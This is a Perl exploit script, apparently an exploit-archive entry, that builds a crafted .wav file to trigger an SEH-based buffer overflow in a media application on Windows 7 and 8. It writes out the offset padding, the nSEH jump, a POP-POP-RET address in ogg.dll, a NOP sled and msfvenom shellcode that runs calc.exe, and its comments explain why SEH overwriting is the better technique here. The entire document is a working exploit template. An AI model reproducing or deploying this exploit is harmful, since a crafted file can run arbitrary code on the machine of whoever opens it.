#!/usr/bin/env perl # original p0c https://www.exploit-db.com/exploits/36465/ # credit to TUNISIAN CYBER # however he was attemping to vanilla buffer overflow # in fact it is SEH based exploit # using the address 0x7C9D30D7 is limit the targets #which I assume belongs to OS file didn't work on win7 #yes he did find a buffer overflow since the offset reaches ESP before SEH #in this app, SEH based exploits are more effective and the main vuln in this case should be SEH #This p0c > win 7s & 8s # ThreatActor at CoreRed.com ## my $file = "p0c.wav"; my $buff = "A" x 4116; # offset to SEH my $nseh = "\xeb\x06\xff\xff"; #dat 8 jmp my $seh = pack('V', 0x66E42A79); # 66E42A79 5E POP ESI ogg.dll my $nop = "\x90" x 28; #msfvenom -p windows/exec CMD=calc.exe -f perl -b '\x00\xff\x0a\x0d' my $shell = "\xda\xcd\xd9\x74\x24\xf4\xb8\x50\x99\x22\x39\x5b\x33\xc9" . "\xb1\x31\x31\x43\x18\x83\xc3\x04\x03\x43\x44\x7b\xd7\xc5" . "\x8c\xf9\x18\x36\x4c\x9e\x91\xd3\x7d\x9e\xc6\x90\x2d\x2e" . "\x8c\xf5\xc1\xc5\xc0\xed\x52\xab\xcc\x02\xd3\x06\x2b\x2c" . "\xe4\x3b\x0f\x2f\x66\x46\x5c\x8f\x57\x89\x91\xce\x90\xf4" . "\x58\x82\x49\x72\xce\x33\xfe\xce\xd3\xb8\x4c\xde\x53\x5c" . "\x04\xe1\x72\xf3\x1f\xb8\x54\xf5\xcc\xb0\xdc\xed\x11\xfc" . "\x97\x86\xe1\x8a\x29\x4f\x38\x72\x85\xae\xf5\x81\xd7\xf7" . "\x31\x7a\xa2\x01\x42\x07\xb5\xd5\x39\xd3\x30\xce\x99\x90" . "\xe3\x2a\x18\x74\x75\xb8\x16\x31\xf1\xe6\x3a\xc4\xd6\x9c" . "\x46\x4d\xd9\x72\xcf\x15\xfe\x56\x94\xce\x9f\xcf\x70\xa0" . "\xa0\x10\xdb\x1d\x05\x5a\xf1\x4a\x34\x01\x9f\x8d\xca\x3f" . "\xed\x8e\xd4\x3f\x41\xe7\xe5\xb4\x0e\x70\xfa\x1e\x6b\x8e" . "\xb0\x03\xdd\x07\x1d\xd6\x5c\x4a\x9e\x0c\xa2\x73\x1d\xa5" . "\x5a\x80\x3d\xcc\x5f\xcc\xf9\x3c\x2d\x5d\x6c\x43\x82\x5e" . "\xa5\x20\x45\xcd\x25\x89\xe0\x75\xcf\xd5"; open($FILE,">$file"); print $FILE $buff.$nseh.$seh.$nop.$shell; close($FILE); print "+++++++++++++++++++\n";